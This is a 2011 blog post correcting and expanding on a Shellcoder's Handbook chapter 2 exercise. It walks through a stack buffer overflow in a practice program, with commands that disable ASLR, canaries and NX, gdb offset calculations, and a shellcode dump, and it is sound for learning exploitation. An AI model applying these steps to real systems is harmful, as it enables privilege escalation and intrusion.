Errata and Notes for ShellCoder's Handbook: 2011

Chapter 2 presents a simple C program that contains a buffer overflow, victim.c:

#include <string.h>
int main(int argc, char *argv[]) {
  char little_array[512];
  if (argc > 1)
    strcpy(little_array, argv[1]);
}

The chapter then proceeds to present a series of approaches to exploiting this application. We'll start with the first approach, which is one of the most basic and fundamental approaches you can take with a unrestricted stack buffer: A payload containing shellcode, followed by the address of the shellcode one or more times. Repeating the address of the shellcode is just a fudge-factor; technically, we only need it once in order to overwrite the return address, but we have to fill our buffer with SOMETHING, and it may as well be the address of our shellcode. We could just as easily substitute in NOPs or any kind of junk data, though, aside from null characters (\x00), which would terminate the strcpy() prematurely. In some cases, repeating your target offset may give you more leeway when the exact location of the memory you want to overwrite is unpredictable.

There are a number of steps to overcome to get this basic exploit working. First, you need to decide which platform (version of Linux, compiler, etc.) you want to exploit this on. You can certainly use an older version of an operating system (like this version of Debian based on the Linux version used in the book), and this will reduce the number of extra steps you will have to take beyond what the book describes. Personally, I prefer to have the amenities of using a modern version of Linux, and also have some sense about what changes have been made to Linux and gcc to thwart such attacks. This also tells me what exploit mitigations I need to learn to defeat in order to get my exploits working on current platforms. I use a default version of Ubuntu Linux Desktop (10.10) for this purpose.

Since I've opted to use modern versions of Linux and gcc, there are a bunch of exploit mitigation technologies that I need to either circumvent or turn off in order to get this attack working. Since we're still early in the book, let's start by just turning them off. These technologies include:

1. ASLR - Randomization of memory segments that makes it difficult to find the address of the buffer we're overflowing, and thus difficult to find our shellcode in memory when we're trying to jump to it. This is a system-wide setting in Linux. I disable this with a short bash script (aslroff.sh):

echo 0 > /proc/sys/kernel/randomize_va_space
cat /proc/sys/kernel/randomize_va_space

Which is invoked with:

$ sudo ./aslroff.sh

The default value in Ubuntu 10.10 is "2" rather than "0". "0" means "off".

2. Stack cookies -- A stack cookie is an unpredictable value put on the stack between our buffer and the return address we want to overwrite. There's a call to a function to check this "canary" each time before returning from a given function, so if the canary fails this test, the program will be terminated before we get to jump to our overwritten return address. This is a program-specific, compiler-level protection that is turned on by default in gcc. This can be disabled by compiling our victim program with the gcc switch "-fno-stack-protector".

3. DEP or NX -- This is an exploit mitigation that stops a program from executing code that is located on the stack. Most programs don't need to execute code from the stack, and so are set with this executable flag to protect them. A convenient utility to disable this protection is "execstack". execstack is not included by default in my copy of Ubuntu, I had to install it with "sudo apt-get install execstack". Once we've compiled our program, we can remove this default protection mechanism by running:

$ execstack -s ./victim

The book suggests that we want to get shell as root (we'll see that there's a problem with this down the road), so taking all of this into account, the commands you want to run would look something like:

$ sudo gcc -fno-stack-protector -mpreferred-stack-boundary=2 -o victim victim.c
$ sudo execstack -s victim
$ sudo chown root victim
$ sudo chmod +s victim

Hooray! Now we have a victim program with no DEP, ASLR, or stack canaries, running with root privileges.

attack.c is written in such a way to make it easy to change the length of the payload, and to modify our guesstimate on the start location of our buffer. With this first approach, we don't have the luxury of a NOP sled, and need the exact offset of our shellcode in memory. The book is purposely vague on how to determine the proper payload length and memory offset at this point; it hasn't discussed in depth how to reverse target programs to obtain these values. The tediousness of blindly guessing these values illustrates the value of a NOP slded. However, if you already have some familiarity with basic commands in gdb, you can easily determine these values with a little reverse engineering, and use them as arguments to attack.c to generate a successful payload.

For attack.c, you will have to make the modification mentioned in bNull's previous post in order for it to generate anything at all; be sure that you place the malloc() AFTER you read in the command-line args. Once you've made that fix, we want to determine 1) how much data on the stack we need to overwrite in order to overwrite main's return address, and 2) where our shellcode is in memory, so we can jump (technically, RET) to it.

Let's go ahead and load our victim program into gdb:

$ gdb -q ./victim

In order how to figure out how long our payload needs to be, we need to find out 2 things: a) where the buffer we're overflowing starts, and b) the RA that we're trying to overwrite. Since the vulnerable strcpy() occurs in main(), we're looking to overwrite the RA that is used by the RET in main(). If we disassemble the main function with "disas main":

NOTE: YOUR SYSTEM MAY AND PROBABLY WILL DIFFER FROM MINE, SO FOLLOW ALONG ON YOUR OWN SYSTEM AND USE THE ADDRESSES THAT IT GENERATES, RATHER THAN THE ONES YOU SEE HERE.

(gdb) disas main
Dump of assembler code for function main:
   0x080483c4 <+0>:    push   %ebp
   0x080483c5 <+1>:    mov    %esp,%ebp
   0x080483c7 <+3>:    sub    $0x208,%esp
   0x080483cd <+9>:    cmpl   $0x1,0x8(%ebp)
   0x080483d1 <+13>:    jle    0x80483ed <main+41>
   0x080483d3 <+15>:    mov    0xc(%ebp),%eax
   0x080483d6 <+18>:    add    $0x4,%eax
   0x080483d9 <+21>:    mov    (%eax),%eax
   0x080483db <+23>:    mov    %eax,0x4(%esp)
   0x080483df <+27>:    lea    -0x200(%ebp),%eax
   0x080483e5 <+33>:    mov    %eax,(%esp)
   0x080483e8 <+36>:    call   0x80482f4 <strcpy@plt>
   0x080483ed <+41>:    leave
   0x080483ee <+42>:    ret
End of assembler dump.

Based on our (presumed) understanding of how the stack works, we know that the RET command at 0x080483ee will pop the return address from the stack (currently pointed to by ESP) and jump to that address. If we set a breakpoint at that instruction and look at the value of ESP, that will tell us exactly where in the stack segment the return address lies; since we have ASLR disabled, it will always be the same address.

(gdb) break *0x080483ee
Breakpoint 1 at 0x80483ee
(gdb) run putwhateverhere
Starting program: /home/kjw/shellcoders-handbook/victim putwhateverhere
Breakpoint 1, 0x080483ee in main ()

Note: We have to prefix the address that we want to set a breakpoint at in order to tell gdb that it's a memory address, rather than a c function called "0x080483ee()". Then, we run the program, giving it some junk text as a parameter so that it will pass the "if (argc > 1)" check. As we hoped, the program stopped right before executing the RET command. Now, if we look at ESP:

(gdb) x/xw $esp
0xbffffbcc:    0x00155ce7
(gdb) disas 0x00155ce7
Dump of assembler code for function __libc_start_main:
0x00155c00 <+0>:    push   %ebp
0x00155c01 <+1>:    mov    %esp,%ebp
...

We can see that ESP is currently pointing at a function called "__libc_start_main". This is a function that is executed before the main() function is executed, and which actually calls main(), so naturally we are returning to that function when we return from main(). We can also see that the RA we want to overwrite on the stack is located at the address 0xbffffbcc. In Ubuntu 10.10, stack addresses tend to start with "0xbffff".

Now we need to find out where the buffer starts on the stack. There are lots of ways to figure this out, but to keep things simple, let's just restart the program with an input to the buffer that will be easy to recognize in memory, and stick with the same breakpoint at RET in main(). I like to use a bunch of "A"s, the ASCII code of which is 0x41 in hex.

(gdb) run AAAAAAAAAAAAAAAAAA
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/kjw/shellcoders-handbook/victim AAAAAAAAAAAAAAAAAA

Breakpoint 1, 0x080483ee in main ()

So again, we have our stack pointer pointing at the return address from main(). The RA was pushed to the stack before main() was called, so our target buffer must have been created somewhere later on the stack. Since the stack grows up toward smaller addresses in memory, our buffer is going to be in a lower memory address than where ESP currently points to. Memory will look something like:

lower address e.g. 0x00000000
/\

[target buffer, approximately 512-bytes in length]
[some other stuff, possibly]
[return address]

\/
higher address e.g. 0xffffffff

It's certainly possible that our target buffer may have already been overwritten and otherwise mangled by the time execution arrives at the RET command, but since there's not much going on in our program, it will still be sitting there in memory where we put it with strcpy(); just the stack pointer has been moved since then. We don't know exactly where it will start, but we know it will be at least 512 bytes previous to the RA, since that's the size of the buffer. Unless there is a special case, we'll want to look before that in some multiple of 4 bytes to stay aligned with the stack.

(gdb) x/20xw $esp-532
0xbffff9b8:    0xbffffbc8    0x080483ed    0xbffff9c8    0xbffffdce
0xbffff9c8:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff9d8:    0x00004141    0x00000001    0x0012cff4    0x00000000
0xbffff9e8:    0xbffffa94    0x0011b0df    0x0012dad0    0x00130d78
0xbffff9f8:    0x00000001    0x00000001    0x00000000    0x0011caca

Hey, look! We have a bunch of 0x41's in a row, starting at address 0xbffff9c8 on the stack. That must be the many consecutive "A" characters that we passed to the program as an argument. Now we need to figure out the distance between the beginning of the buffer and the return address that we want to overwrite, so we know how long the payload needs to be.

(gdb) p 0xbffffbcc - 0xbffff9c8
$1 = 516

We actually need to add 4 to this value, because the integer printed here is the distance between the beginning of the buffer and the offset immediately before the RA, which itself is 4 bytes. If you're already a bit familiar with reversing, 520 is exactly what you would expect if the compiler is not putting any fluff on the stack: 512 bytes for the buffer, a 4-byte "saved frame pointer" (SFP), and a 4-byte return address.

We now have almost everything that we need to get our attack working in GDB. We know where our shellcode starts on the stack: at the beginning of the buffer, at 0xbffff9c8. We also know how long our payload needs to be in order to overwrite the return address: 520 bytes. The second value has to be tweaked slightly due to the way that attack.c is written: we need to add 4 to account for the "BUF=" string added to the beginning of the buffer in attack.c, and add 1 more so that we're not overwriting our destination offset with the null terminating character. The final buffer length argument we'll use is 525. In order to get that first offset value (0xbffff9c8) working with our attack.c program, we just need to relate that address to the guesstimate offset that's included in attack.c. We can figure this out by trying it with an offset argument of 0 first:

kjw@ubuntu-vm0:~/shellcoders-handbook$ ./attack 525 0
Attempting address: 0xbffffbd8

Without any offset provided by us, the program will create a payload that guesses that the shellcode can be found at 0xbffffbd8. Wrong! Where in attack.c do we use that offset argument to change the guess?

addr = find_start() - offset;

OK, so if the offset is zero, that means that addr = find_start() - 0 = 0xbffffbd8. We want addr to be 0xbffff9c8. This means the following equation will compute the "addr" guess based on the offset argument provided to attack.c:

0xbffffbd8 - 0xbffff9c8 = offset

Let's find the right offset to use:

kjw@ubuntu-vm0:~/shellcoders-handbook$ gdb -q
(gdb) p 0xbffffbd8 - 0xbffff9c8
$1 = 528

Alright, so if we use a bsize argument of 525 and an offset argument of 528, our exploit should work. Let's try it in gdb. Before that, let's exit the /bin/sh shell that was started by running "attack" last time.

kjw@ubuntu-vm0:~/shellcoders-handbook$ exit
exit
kjw@ubuntu-vm0:~/shellcoders-handbook$ ./attack 525 528
Attempting address: 0xbffff9c8
kjw@ubuntu-vm0:~/shellcoders-handbook$ gdb -q ./victim
Reading symbols from /home/kjw/shellcoders-handbook/victim...(no debugging symbols found)...done.
(gdb) run $BUF
Starting program: /home/kjw/shellcoders-handbook/victim $BUF

Program received signal SIGSEGV, Segmentation fault.
0xbffff9c8 in ?? ()

Oops. The program crashed, no shell. gdb tells us that when it crashed, it was executing our target offset at 0xbffff9c8. Let's look at the stack there right before the RET command is executed.

(gdb) b *0x080483ee
Breakpoint 1 at 0x80483ee
(gdb) run $BUF
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/kjw/shellcoders-handbook/victim $BUF

Breakpoint 1, 0x080483ee in main ()
(gdb) x/x $esp
0xbffff27c:    0xbffff9c8
(gdb) x/x 0xbffff9c8
0xbffff9c8:    0x67733a31
(gdb) x/20x $esp-532
0xbffff068:    0xbffff278    0x080483ed    0xbffff078    0xbffff49a
0xbffff078:    0x315e1aeb    0x074688c0    0x5e891e8d    0x0c468908
0xbffff088:    0xf3890bb0    0x8d084e8d    0x80cd0c56    0xffffe1e8
0xbffff098:    0x69622fff    0x68732f6e    0xbffff9c8    0xbffff9c8
0xbffff0a8:    0xbffff9c8    0xbffff9c8    0xbffff9c8    0xbffff9c8

This doesn't look like the start of our shellcode; we were looking for 0x315e1aeb but found 0x67733a31. And there's another thing that's strange here. When we were first finding the beginning of our shellcode on the stack, it was at 0xbffffbcc, and now it's at 0xbffff078. It's moved, even though we disabled ASLR. What's changed since then? Well, instead of just providing a junk string to victim, we've now executed attack.c with some arguments, which then creates an environment variable in another invocation of /bin/sh with "putenv(buff)" and "system("/bin/bash -p")" in attack.c. All of this has the potential to change the stack by the time we start running victim.c in gdb.

So, as you can see, if we are going to use this approach of storing our payload in an environment variable and invoking /bin/sh with it, we either need to predict exactly how this will impact the stack, or we need to use an iterative process to figure out the correct values for our offsets and payload size. Let's see if we can get the correct values by debugging in as close to the final attack environment as possible. First, we want to make sure that we always return to the same common point in /bin/sh invocations; otherwise, each new invocation will move the stack around. I'm connected to an Ubuntu virtual machine via ssh, and I don't enable colors on the command-line interface. Whenever I invoke another /bin/sh, it enables colors. So, I know that I've returned to a common point when I've run exit enough times to have no color.

kjw@ubuntu-vm0:~/shellcoders-handbook$ ./attack 520 0
Attempting address: 0xbffffbd8

Default offset for attack.c is still 0xbffffbd8.

kjw@ubuntu-vm0:~/shellcoders-handbook$ gdb -q
(gdb) p 0xbffffbd8-0xbffff078
$1 = 2912

New offset arg to use is 2912.

Now exit back to the common bash invocation and try these new values with attack.c.

kjw@ubuntu-vm0:~/shellcoders-handbook$ exit
exit
kjw@ubuntu-vm0:~/shellcoders-handbook$ ./attack 525 2912
Attempting address: 0xbffff078
kjw@ubuntu-vm0:~/shellcoders-handbook$ gdb -q ./victim
Reading symbols from /home/kjw/shellcoders-handbook/victim...(no debugging symbols found)...done.
(gdb) run $BUF
Starting program: /home/kjw/shellcoders-handbook/victim $BUF
process 10639 is executing new program: /bin/dash
$

Success! We overwrote the return address with the offset of our shellcode, and our shellcode got us root. Right?

$ whoami
kjw

Unfortunately for us, bash will drop privileges by default. We need different shellcode that prepends a call to seteuid() before invoking bash. I'll hopefully be writing another blog post about how to use the Metasploit Framework to generate shellcode that can do this for us. For now, let's just try to get this non-root exploit working outside of gdb. What happens when we try to run it with the same parameters outside of gdb?

kjw@ubuntu-vm0:~/shellcoders-handbook$ ./attack 525 2912
Attempting address: 0xbffff078
kjw@ubuntu-vm0:~/shellcoders-handbook$ ./victim $BUF
Illegal instruction

So, it appears that the mere act of executing the program in gdb as opposed to from the shell changes the stack and blows our exploit. Figuring out how to modify the offset to account for this can be a bit tricky, so I'll leave that for another blog post as well.

(Edited 4/17 with a few corrections about Linux versions from todb for sake of clarity.)

Errata and Notes for ShellCoder's Handbook

Sunday, April 10, 2011

Chapter 2, "Using an Exploit", pp 31-38 Continued

Blog Archive